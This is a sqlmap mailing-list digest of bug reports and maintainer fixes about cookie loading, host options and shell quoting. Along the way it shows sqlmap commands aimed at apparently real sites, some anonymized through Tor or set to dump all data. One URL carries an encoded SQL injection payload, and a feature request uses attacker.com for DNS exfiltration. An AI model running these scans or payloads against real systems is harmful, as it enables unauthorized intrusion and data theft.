>>> Subject: Re: [sqlmap-users] --load-cookies >>> To: Miroslav Stampar <mir...@gm...> >>> Cc: SqlMap List <sql...@li...> >>> Message-ID: <516...@dr...> >>> Content-Type: text/plain; charset=ISO-8859-1 >>> >>> >>> >>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote: >>> > Nevertheless, with the latest commit that check should be >>> "neutralized" now. Could you please retry it now? 
>>>
>>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> hiccups, using the same file:
>>>
>>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>>> Traceback (most recent call last):
>>>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>>>     assert domain_specified == initial_dot
>>> AssertionError
>>>
>>>   _warn_unhandled_exception()
>>> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>
>>> the 999.. looks strange to me.
>>>
>>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
>>> >
>>> > Hi Dirk.
>>> >
>>> > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>>> >
>>>
>>> that's true but IMO 0 represents just a session cookie. Example:
>>>
>>> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
>>> # HTTP cookie file.
>>> # Generated by Wget on 2013-04-15 11:23:13.
>>> # Edit at your own risk.
>>>
>>> .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>>> .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>>> .bing.com TRUE / FALSE 0 _HOP
>>> .bing.com TRUE / FALSE 0 _FS NU=1
>>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>> www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>>>
>>> prompt%
>>>
>>> Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>>>
>>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
>>> cookie only for the first 120 tries.
>>>
>>> Cheers, Dirk
>>>
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> >
>>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
>>> >
>>> > Hi Miroslav,
>>> >
>>> > thx for your prompt answer.
>>> >
>>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > Hi Dirk.
>>> > >
>>> > > Could you please get the latest revision and retry it again?
>>> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>>> > The slight difference seems to be that in the case where I didn't supply a cookie
>>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>>> > >
>>> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>>> > >
>>> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>>> >
>>> > sure, here you go:
>>> >
>>> > --snip
>>> > # Netscape HTTP Cookie File
>>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>> > [..]
>>> > --snap
>>> >
>>> > They are all session cookies. For easier reading here I put some blanks in the line
>>> > above, in "cookie-file" there aren't any though. Cookies were generated with
>>> > stompy and a shell script (looks the same as with
>>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>>> >
>>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>>> >
>>> > >
>>> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>>> >
>>> > see above.
>>> >
>>> > Cheers,
>>> >
>>> > Dirk
>>> >
>>> > >
>>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > yes unfortunately.
>>> > >
>>> > > If I omit the cookie line in the request header completely, sqlmap
>>> > > seems to take the first cookie issued by the server with set-cookie (and
>>> > > puts it silently in).
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > Hi.
>>> > > >
>>> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > >
>>> > > > Kind regards,
>>> > > > Miroslav Stampar
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
>>> > > >
>>> > > > Hi folks,
>>> > > >
>>> > > > .... that doesn't work for me. It always uses the cookie supplied
>>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>> > > > from the 1st server reply is being used)
>>> > > >
>>> > > > So what is wrong in here:
>>> > > >
>>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > --level=2 --risk=2 -r $REQUEST
>>> > > >
>>> > > > The content of the file $REQUEST is:
>>> > > >
>>> > > > POST <URL> HTTP/1.1
>>> > > > Host: <HOST>
>>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
>>> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > Accept-Language: en-US,en;q=0.5
>>> > > > Accept-Encoding: gzip, deflate
>>> > > > Referer: <Referer>
>>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > Connection: keep-alive
>>> > > > Content-Type: application/x-www-form-urlencoded
>>> > > > Content-Length: 67
>>> > > >
>>> > > > <abunchofpostparams>
>>> > > >
>>> > > > No hints that cookie-file is not in correct format (I've been through this,
>>> > > > at least I think so ;) ).
>>> > > >
>>> > > > Any insight would be much appreciated.
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > > ------------------------------------------------------------------------------
>>> > > > Precog is a next-generation analytics platform capable of advanced
>>> > > > analytics on semi-structured data. The platform includes APIs for building
>>> > > > apps and a phenomenal toolset for data science. Developers can use
>>> > > > our toolset for easy data analysis & visualization. Get a free account!
>>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > _______________________________________________
>>> > > > sqlmap-users mailing list
>>> > > > sql...@li...
>>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>>
>>> ------------------------------
>>>
>>> Message: 3
>>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Dirk Wetter <sp...@dr...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Dirk.
>>>
>>> Now that crash should be "patched".
>>>
>>> Could you please retry it now and say if the latest revision suits your needs?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>> ------------------------------
>>>
>>> Message: 4
>>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in clean_filesystem
>>> To: Brandon Perry <bpe...@gm...>
>>> Cc: sqlmap users <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX3RNQDm=PqT...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Brandon.
>>>
>>> Thank you for your patch and find it now included [1].
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1] https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>>
>>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...> wrote:
>>>
>>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
>>> > call when self.output_directory is NoneType and clean_system() is called.
>>> >
>>> > --
>>> > http://volatile-minds.blogspot.com -- blog
>>> > http://www.volatileminds.net -- website
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>> ------------------------------
>>>
>>> Message: 5
>>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>>> From: Dirk Wetter <sp...@dr...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID: <516...@dr...>
>>> Content-Type: text/plain; charset=ISO-8859-1
>>>
>>> Hi Miroslav,
>>>
>>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>>> > Hi Dirk.
>>> >
>>> > Now that crash should be "patched".
>>> >
>>> > Could you please retry it now and say if the latest revision suits your needs?
>>>
>>> cool, thx. Works!
>>>
>>> However (sorry):
>>>
>>> One needs to omit the cookie in the request header, otherwise it just uses the one
>>> supplied by the request.
>>>
>>> Then: It doesn't change the cookie. Maybe I was interpreting that not correctly
>>> but my point was using the load-cookies option to direct sqlmap to change
>>> cookies once in a while (whenever that's gonna be). This is to circumvent
>>> restrictions one can encounter otherwise....
>>>
>>> Cheers,
>>>
>>> Dirk
>>>
>>> ------------------------------
>>>
>>> Message: 6
>>> Date: Mon, 15 Apr 2013 14:01:01 -0700
>>> From: <co...@5i...>
>>> Subject: [sqlmap-users] --host parameter
>>> To: sql...@li...
>>> Message-ID:
>>> <201...@em...>
>>> Content-Type: text/plain; charset="utf-8"
>>>
>>> Hello,
>>> the --host doesn't work as expected, or I am doing something wrong:
>>>
>>> this works as expected:
>>>
>>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>>
>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>>> http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by
>>> this program
>>>
>>> [*] starting at 23:57:15
>>>
>>> [23:57:15] [INFO] testing connection to the target URL
>>> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>> [23:57:15] [INFO] testing if the target URL is stable.
>>> This can take a couple of seconds
>>> [23:57:16] [INFO] target URL is stable
>>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
>>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>>
>>> ....
>>>
>>> this doesn't work as expected:
>>>
>>> ./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0'
>>>
>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>>> http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by
>>> this program
>>>
>>> [*] starting at 23:58:03
>>>
>>> [23:58:03] [INFO] testing connection to the target URL
>>> [23:58:03] [CRITICAL] page not found (404)
>>> it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
>>> [23:58:05] [WARNING] HTTP error codes detected during run:
>>>
>>> ............
>>>
>>> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>>
>>> Thanks.
>>>
>>> ------------------------------
>>>
>>> Message: 7
>>> Date: Tue, 16 Apr 2013 09:12:05 +1100
>>> From: ???????? ?????? <vo...@s2...>
>>> Subject: [sqlmap-users] Sqlmap and direct connect error
>>> To: sql...@li...
>>> Message-ID: <C59...@s2...>
>>> Content-Type: text/plain; charset=us-ascii
>>>
>>> Hi!
>>>
>>> This bug detected if add direct param.
>>>
>>> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
>>>
>>> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev-de99717
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
>>> Technique: None
>>> Back-end DBMS: MySQL (identified)
>>> Traceback (most recent call last):
>>>   File "sqlmap.py", line 87, in main
>>>     start()
>>>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
>>>     action()
>>>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>>>     setHandler()
>>>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
>>>     conf.dbmsConnector.connect()
>>>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
>>>     self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
>>>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
>>>     return Connection(*args, **kwargs)
>>>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
>>>     self._connect()
>>>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
>>>     sock.connect((self.host, self.port))
>>>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
>>>     raise GeneralProxyError((5, _generalerrors[5]))
>>> GeneralProxyError: (5, 'bad input')
>>>
>>> ------------------------------
>>>
>>> Message: 8
>>> Date: Tue, 16 Apr 2013 14:19:18 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] --host parameter
>>> To: co...@5i...
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi.
>>>
>>> Thank you for your report and find it fixed with the latest commit [1].
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1] https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>>>
>>> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>>>
>>> > Hello,
>>> > the --host doesn't work as expected, or I am doing something wrong:
>>> >
>>> > this works as expected:
>>> >
>>> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>> >
>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>>> > http://sqlmap.org
>>> >
>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> > prior mutual consent is illegal. It is the end user's responsibility to
>>> > obey all applicable local, state and federal laws.
Developers assume no >>> > liability and are not responsible for any misuse or damage caused by >>> > this program >>> > >>> > [*] starting at 23:57:15 >>> > >>> > [23:57:15] [INFO] testing connection to the target URL >>> > [23:57:15] [INFO] heuristics detected web page charset 'ascii' >>> > [23:57:15] [INFO] testing if the target URL is stable. This can take a >>> > couple of seconds >>> > [23:57:16] [INFO] target URL is stable >>> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >>> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >>> > [23:57:16] [INFO] GET parameter 'id' is dynamic >>> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >>> > might be injectable (possible DBMS: 'MySQL') >>> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >>> > >>> > >>> > .... >>> > >>> > >>> > this doesn't work as expected: >>> > >>> > ./sqlmap.py --host='i.csland.ro' >>> > --url='http://188.240.236.15/index.php?id=0' >>> > >>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >>> > takeover tool >>> > http://sqlmap.org >>> > >>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >>> > prior mutual consent is illegal. It is the end user's responsibility to >>> > obey all applicable local, state and federal laws. Developers assume no >>> > liability and are not responsible for any misuse or damage caused by >>> > this program >>> > >>> > [*] starting at 23:58:03 >>> > >>> > [23:58:03] [INFO] testing connection to the target URL >>> > [23:58:03] [CRITICAL] page not found (404) >>> > it is not recommended to continue in this kind of cases. Do you want to >>> > quit and make sure that everything is set up properly? [Y/n] >>> > [23:58:05] [WARNING] HTTP error codes detected during run: >>> > >>> > ............ >>> > >>> > >>> > Of course i.csland.ro resolves to 188.240.236.15. Any idea? >>> > >>> > Thanks. 
>>> > >>> > >>> > >>> > >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> ------------------------------ >>> >>> Message: 9 >>> Date: Tue, 16 Apr 2013 14:33:33 +0200 >>> From: Miroslav Stampar <mir...@gm...> >>> Subject: Re: [sqlmap-users] Sqlmap and direct connect error >>> To: ???????? ?????? <vo...@s2...> >>> Cc: SqlMap List <sql...@li...> >>> Message-ID: >>> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...> >>> Content-Type: text/plain; charset="koi8-r" >>> >>> Hi Vladimir. >>> >>> Find it "patched" with the latest commit [1]. Basically, those >>> combinations >>> should not be allowed (-d and --url; -d and --tor; etc.) and now we've >>> added new option validation checks for this kind of cases. >>> >>> Kind regards, >>> Miroslav Stampar >>> >>> [1] >>> >>> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a >>> >>> >>> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote: >>> >>> > Hi! >>> > >>> > This bug detected if add direct param. 
>>> > >>> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >>> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >>> > --exclude-sysdbs >>> > >>> > >>> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >>> retry >>> > your run with the latest development version from the GitHub >>> repository. If >>> > the exception persists, please send by e-mail to ' >>> > sql...@li...' or open a new issue at ' >>> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following >>> > text and any information required to reproduce the bug. The developers >>> will >>> > try to reproduce the bug, fix it accordingly and get back to you. >>> > sqlmap version: 1.0-dev-de99717 >>> > Python version: 2.7.3 >>> > Operating system: posix >>> > Command line: sqlmap.py -d >>> > **************************************************** -u >>> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >>> > --exclude-sysdbs >>> > Technique: None >>> > Back-end DBMS: MySQL (identified) >>> > Traceback (most recent call last): >>> > File "sqlmap.py", line 87, in main >>> > start() >>> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >>> > start >>> > action() >>> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in >>> action >>> > setHandler() >>> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >>> > setHandler >>> > conf.dbmsConnector.connect() >>> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, >>> in >>> > connect >>> > self.connector = pymysql.connect(host=self.hostname, user=self.user, >>> > passwd=self.password, db=self.db, port=self.port, >>> > connect_timeout=conf.timeout, use_unicode=True) >>> > File >>> > >>> 
"/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >>> > line 93, in Connect >>> > return Connection(*args, **kwargs) >>> > File >>> > >>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >>> > line 584, in __init__ >>> > self._connect() >>> > File >>> > >>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >>> > line 739, in _connect >>> > sock.connect((self.host, self.port)) >>> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >>> > connect >>> > raise GeneralProxyError((5, _generalerrors[5])) >>> > GeneralProxyError: (5, 'bad input') >>> > >>> > >>> > >>> > >>> ------------------------------------------------------------------------------ >>> > Precog is a next-generation analytics platform capable of advanced >>> > analytics on semi-structured data. The platform includes APIs for >>> building >>> > apps and a phenomenal toolset for data science. Developers can use >>> > our toolset for easy data analysis & visualization. Get a free account! >>> > http://www2.precog.com/precogplatform/slashdotnewsletter >>> > _______________________________________________ >>> > sqlmap-users mailing list >>> > sql...@li... >>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> > >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> -------------- next part -------------- >>> An HTML attachment was scrubbed... >>> >>> ------------------------------ >>> >>> Message: 10 >>> Date: Tue, 16 Apr 2013 23:26:39 +0200 >>> From: buawig <bu...@gm...> >>> Subject: [sqlmap-users] feature request: offline mode for >>> --dns-domain? 
>>> To: SqlMap List <sql...@li...> >>> Message-ID: <516...@gm...> >>> Content-Type: text/plain; charset=UTF-8 >>> >>> Hi, >>> >>> in cases where sqlmap is run against targets on internal networks it >>> would be great if one could tell sqlmap to simply proceed without >>> expecting incoming DNS requests, because sqlmap can not be executed >>> directly on the DNS server (which can't reach the target, but the >>> target can reach the DNS server). >>> >>> For me it would be enough to simply run something like >>> - -u ... --dns-domain=attacker.com --dns-port=0 >>> (--dns-port does not exist [yet]) >>> >>> to let sqlmap know that it doesn't need to start a DNS listener. >>> >>> I would then collect and decode the DNS querries on the DNS server >>> manually, but I could also envision running a second sqlmap instance >>> on the DNS server with --dns-domain (but without -u) doing that job. >>> >>> >>> >>> ------------------------------ >>> >>> Message: 11 >>> Date: Tue, 16 Apr 2013 23:24:23 +0200 >>> From: buawig <bua... [truncated message content]
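The kind of option validation described in Message 9 quoted above (`-d` must not be combined with `--url` or `--tor`), written here as an added example; it is not sqlmap's code and not the linked commit. The names `build_parser`, `find_conflicts` and `run` are hypothetical, the conflict table holds only the two pairs the reply names, and the sample command line uses placeholder values.

```python
import argparse

# Constructed command line modelled on the report quoted above; the DSN and
# the URL are placeholders, not values taken from the thread.
REPORTED_ARGV = [
    "-d", "mysql://user:pass@127.0.0.1:3306/tech",
    "-u", "http://target.example/index.phtml?center=7&id=186",
    "--random-agent", "--tor", "--tor-type=SOCKS5", "--tor-port=49832",
    "--dbms=MySQL", "--os=Linux", "--tables", "--exclude-sysdbs",
]

# (dest_a, dest_b, flag_a, flag_b). Only the two pairs named in the reply
# ("-d and --url; -d and --tor") are encoded; its "etc." is not filled in.
CONFLICTS = [
    ("direct", "url", "-d", "--url"),
    ("direct", "tor", "-d", "--tor"),
]


def build_parser():
    """Minimal parser covering the switches used in the reported command line."""
    p = argparse.ArgumentParser(prog="example", add_help=False, allow_abbrev=False)
    p.add_argument("-d", dest="direct")
    p.add_argument("-u", "--url", dest="url")
    p.add_argument("--tor", action="store_true")
    p.add_argument("--tor-type", dest="tor_type")
    p.add_argument("--tor-port", dest="tor_port")
    p.add_argument("--random-agent", action="store_true")
    p.add_argument("--dbms")
    p.add_argument("--os")
    p.add_argument("--tables", action="store_true")
    p.add_argument("--exclude-sysdbs", action="store_true")
    return p


def _is_set(value):
    # Unset string options parse to None, unset switches to False.
    return value is not None and value is not False


def find_conflicts(argv):
    """Return one message per forbidden pair present in argv."""
    args, _unknown = build_parser().parse_known_args(argv)
    found = []
    for dest_a, dest_b, flag_a, flag_b in CONFLICTS:
        if _is_set(getattr(args, dest_a)) and _is_set(getattr(args, dest_b)):
            found.append(
                "option '%s' is incompatible with option '%s'" % (flag_a, flag_b)
            )
    return found


def run(argv, connect):
    """Validate first; call connect() only when the option set is coherent.

    Failing here gives the user a usage error instead of an exception raised
    later from the socket layer, as in the quoted traceback.
    """
    conflicts = find_conflicts(argv)
    if conflicts:
        return 2, conflicts
    connect()
    return 0, []


if __name__ == "__main__":
    status, messages = run(REPORTED_ARGV, connect=lambda: None)
    for message in messages:
        print("[CRITICAL] " + message)
    print("exit status:", status)
```
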
From: B. <sto...@qq...> - 2014-05-17 08:20:45
Hi friends,

I have used sqlmap with the latest version, and this problem occurs. Could you fix this for me?

Thanks, best regards
Robert

[16:17:09] [CRITICAL] unhandled exception in sqlmap/1.0-dev-c181e90, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-c181e90
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap.py -u ******************************************************************* -p id --dbms=MySQL --risk=3 --level=5 -a
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 99, in main
    start()
  File "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/controller.py", line 585, in start
    action()
  File "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/action.py", line 130, in action
    conf.dbmsHandler.dumpAll()
  File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/entries.py", line 367, in dumpAll
    self.getTables()
  File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line 215, in getTables
    dbs = self.getDbs()
  File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line 175, in getDbs
    kb.data.cachedDbs = list(set(kb.data.cachedDbs))
TypeError: unhashable type: 'list'

------------------

------------------ Original ------------------
From: "Miroslav Stampar";<mir...@gm...>;
Date: Tue, May 13, 2014 09:40 PM
To: "Bob"<sto...@qq...>;
Cc: "SqlMap List"<sql...@li...>;
Subject: Re: Re: [sqlmap-users] sqlmap-user event not found error

Hi Bob.

It's a bash problem (reproduced it this moment). Using single quotes (') instead of double quotes (") should solve this issue.

Kind regards,
Miroslav Stampar

On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote:

Hi Miroslav,

Thanks for your email, but it is still the same after I tried sqlmap -u ".."

sqlmap -u "http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa"
bash: !search.do?keyword=: event not found

best regards
bob

------------------

------------------ Original ------------------
From: "Miroslav Stampar";<mir...@gm...>;
Date: Sun, May 11, 2014 10:38 PM
To: "Bob"<sto...@qq...>;
Cc: "SqlMap List"<sql...@li...>;
Subject: Re: [sqlmap-users] sqlmap-user event not found error

Hi Bob.

Please enclose the URL part with quotes (e.g. ./sqlmap.py -u "..." ...)

Kind regards,
Miroslav Stampar

On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:

Hi friend,

I have a problem with ! inside the URL .
/sqlmap.py -u http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail= -p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
bash: !search.do?keyword=: event not found

What should I do?

Thanks
bob

------------------

------------------ Original ------------------
From: "Miroslav Stampar";<mir...@gm...>;
Date: Fri, May 31, 2013 03:00 AM
To: "Bob"<sto...@qq...>;
Cc: "sqlmap-users"<sql...@li...>;
Subject: Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1

Hi.

Have you been able to retrieve user names normally? I mean, were they normally displayed in console output? Also, is boolean technique the only one detected by sqlmap in your case (or maybe UNION)?

Kind regards,
